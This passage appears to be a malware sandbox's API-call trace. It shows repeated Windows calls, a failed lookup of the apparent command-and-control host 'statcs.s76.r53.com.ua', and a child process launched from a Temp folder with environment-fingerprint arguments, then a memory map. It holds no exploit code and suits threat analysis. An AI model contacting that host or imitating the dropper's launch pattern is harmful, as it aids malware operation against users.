[0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] GetCurrentThreadId () returned 0xcb8 [0108.832] WSACleanup () returned 0 [0108.883] FreeLibrary (hLibModule=0x77380000) returned 1 [0108.883] GetCurrentThreadId () returned 0xcb8 [0108.883] GetCurrentThreadId () returned 0xcb8 [0108.883] GetCurrentProcess () returned 0xffffffff [0108.883] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x400000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x40, RegionSize=0x11d000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c [0108.883] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x51d000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x51d000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x3000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0108.883] GetCurrentThreadId () returned 0xcb8 [0108.883] GetCurrentThreadId () returned 0xcb8 [0108.883] ResetEvent (hEvent=0x88) returned 1 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] ResetEvent (hEvent=0x88) returned 1 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] CloseHandle (hObject=0x88) returned 1 [0108.884] CloseHandle (hObject=0x8c) returned 1 [0108.884] CloseHandle (hObject=0x84) returned 1 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] GetCurrentThreadId () returned 0xcb8 [0108.884] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.884] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.884] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.884] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.884] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.884] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.884] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.884] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.884] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.884] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.884] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.884] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.884] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.885] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.886] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.886] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.886] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.886] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.886] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.886] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.886] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.886] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.886] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.886] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.886] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.886] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.886] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x16, wMilliseconds=0x156)) [0108.886] VirtualFree (lpAddress=0x1300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0108.888] FreeLibrary (hLibModule=0x76910000) returned 1 [0108.888] LocalFree (hMem=0x2a4470) returned 0x0 [0108.888] FreeLibrary (hLibModule=0x76910000) returned 1 [0108.888] LocalFree (hMem=0x2a4460) returned 0x0 [0108.888] ExitProcess (uExitCode=0x0) Thread: id = 52 os_tid = 0xcbc [0108.652] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0108.652] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x13f8514, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0108.652] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x1431ffc, cbMultiByte=27, lpWideCharStr=0x18aed38, cchWideChar=2047 | out: lpWideCharStr="Host: statcs.s76.r53.com.ua") returned 27 [0108.652] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0108.652] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x13ea714, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="80", lpUsedDefaultChar=0x0) returned 2 [0108.652] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0108.652] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x13f867c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0108.652] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x18afb8c*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x18afbac | out: ppResult=0x18afbac*=0x0) returned 11001 [0108.746] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x18afb8c*(ai_flags=0, ai_family=23, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x18afbac | out: ppResult=0x18afbac*=0x0) returned 11001 [0108.772] getnameinfo (in: pSockaddr=0x18afc14, SockaddrLength=0x0, pNodeBuffer=0x1340fec, NodeBufferSize=0x401, pServiceBuffer=0x1415124, ServiceBufferSize=0x20, Flags=10 | out: pNodeBuffer="", pServiceBuffer="") returned 10047 [0108.773] htons (hostshort=0x0) returned 0x0 [0108.773] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0 [0108.773] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x407d24, cchWideChar=0 | out: lpWideCharStr="") returned 0 [0108.773] GetCurrentThreadId () returned 0xcbc [0108.773] GetCurrentThreadId () returned 0xcbc [0108.773] GetCurrentThreadId () returned 0xcbc [0108.773] GetCurrentThreadId () returned 0xcbc [0108.773] GetCurrentThreadId () returned 0xcbc [0108.773] GetCurrentThreadId () returned 0xcbc [0108.773] GetCurrentThreadId () returned 0xcbc [0108.773] GetCurrentThreadId () returned 0xcbc [0108.773] GetCurrentThreadId () returned 0xcbc [0108.773] GetCurrentThreadId () returned 0xcbc [0108.773] GetCurrentThreadId () returned 0xcbc [0108.773] GetCurrentThreadId () returned 0xcbc [0108.773] SetEvent (hEvent=0x84) returned 1 [0108.773] GetCurrentThreadId () returned 0xcbc [0108.773] GetCurrentThreadId () returned 0xcbc [0108.773] GetCurrentThreadId () returned 0xcbc [0108.773] CloseHandle (hObject=0xb8) returned 1 [0108.773] RtlExitUserThread (Status=0x0) Thread: id = 54 os_tid = 0xcc8 Process: id = "34" image_name = "f8a3iwa6.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe" page_root = "0x7ea16900" os_pid = "0xcc0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "32" os_parent_pid = "0xcac" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5282 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5283 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5284 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 5285 start_va = 0x400000 end_va = 0x51cfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5286 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5287 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5288 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5289 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 5290 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 5294 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5295 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5296 start_va = 0x1b0000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 5297 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 5298 start_va = 0x6e0000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 5299 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5300 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5301 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 5302 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 5303 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5304 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5305 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5306 